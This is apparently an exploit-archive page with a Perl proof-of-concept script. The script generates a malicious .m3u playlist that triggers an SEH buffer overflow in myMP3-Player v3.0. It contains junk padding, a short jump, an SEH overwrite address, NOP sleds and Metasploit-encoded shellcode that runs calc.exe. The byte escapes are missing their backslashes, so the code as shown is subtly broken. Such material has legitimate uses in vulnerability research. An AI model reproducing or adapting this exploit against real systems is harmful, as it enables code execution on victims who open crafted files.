myMP3-Player v3.0 (.m3u) Local Buffer Overflow Exploit (SEH)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : myMP3-Player v3.0 (.m3u) Local Buffer Overflow Exploit (SEH)
# Published : 2010-03-18
# Author : n3w7u
# Previous Title : MediaCoder (.lst) file local Buffer Overflow Exploit
# Next Title : ZippHo 3.0.6 (.zip) 0day stack buffer overflow PoC exploit

#!/usr/bin/perl

# Title: myMP3-Player v3.0 (.m3u) Local Buffer Overflow Exploit (SEH)
# Date: 18.03.2010
# Author: n3w7u
# Software Link: http://www.chip.de/downloads/myMP3-Player-3.0_13008621.html
# Version: 3.0 and the other version can't be download from serious Page, and don't be free.
# Tested on: Windows XP SP3 (ger)


#[ Buffer ][ Short Jump ][ P/P/R ][ NOP ][ Shellcode ][ NOP ]

my $file= "evil.m3u";
my $junk ="x41" x 1040; # for myMp3 Player 5/cracked junk =1056
my $jmp="xEBx08x90x90"; # jmp short
my $seh="x25x12xC8x72"; #72 C8 12 25 msacm32.drv
my $nop ="x90" x 20;
my $nops ="x90" x 10;

# windows/exec - 224 bytes
# http://www.metasploit.com
# Encoder: x86/call4_dword_xor
# EXITFUNC=process, CMD=calc.exe
my $buf =
"x2bxc9x83xe9xcexe8xffxffxffxffxc0x5ex81x76" .
"x0exa8x6ex77xcex83xeexfcxe2xf4x54x86xfexce" .
"xa8x6ex17x47x4dx5fxa5xaax23x3cx47x45xfax62" .
"xfcx9cxbcxe5x05xe6xa7xd9x3dxe8x99x91x46x0e" .
"x04x52x16xb2xaax42x57x0fx67x63x76x09x4ax9e" .
"x25x99x23x3cx67x45xeax52x76x1ex23x2ex0fx4b" .
"x68x1ax3dxcfx78x3exfcx86xb0xe5x2fxeexa9xbd" .
"x94xf2xe1xe5x43x45xa9xb8x46x31x99xaexdbx0f" .
"x67x63x76x09x90x8ex02x3axabx13x8fxf5xd5x4a" .
"x02x2cxf0xe5x2fxeaxa9xbdx11x45xa4x25xfcx96" .
"xb4x6fxa4x45xacxe5x76x1ex21x2ax53xeaxf3x35" .
"x16x97xf2x3fx88x2exf0x31x2dx45xbax85xf1x93" .
"xc2x6fxfax4bx11x6ex77xcexf8x06x46x45xc7xe9" .
"x88x1bx13x9exc2x6cxfex06xd1x5bx15xf3x88x1b" .
"x94x68x0bxc4x28x95x97xbbxadxd5x30xddxdax01" .
"x1dxcexfbx91xa2xadxc9x02x14xe0xcdx16x12xce";

open($File,">$file");
print $File $junk.$jmp.$seh.$nop.$buf.$nops;
close($File);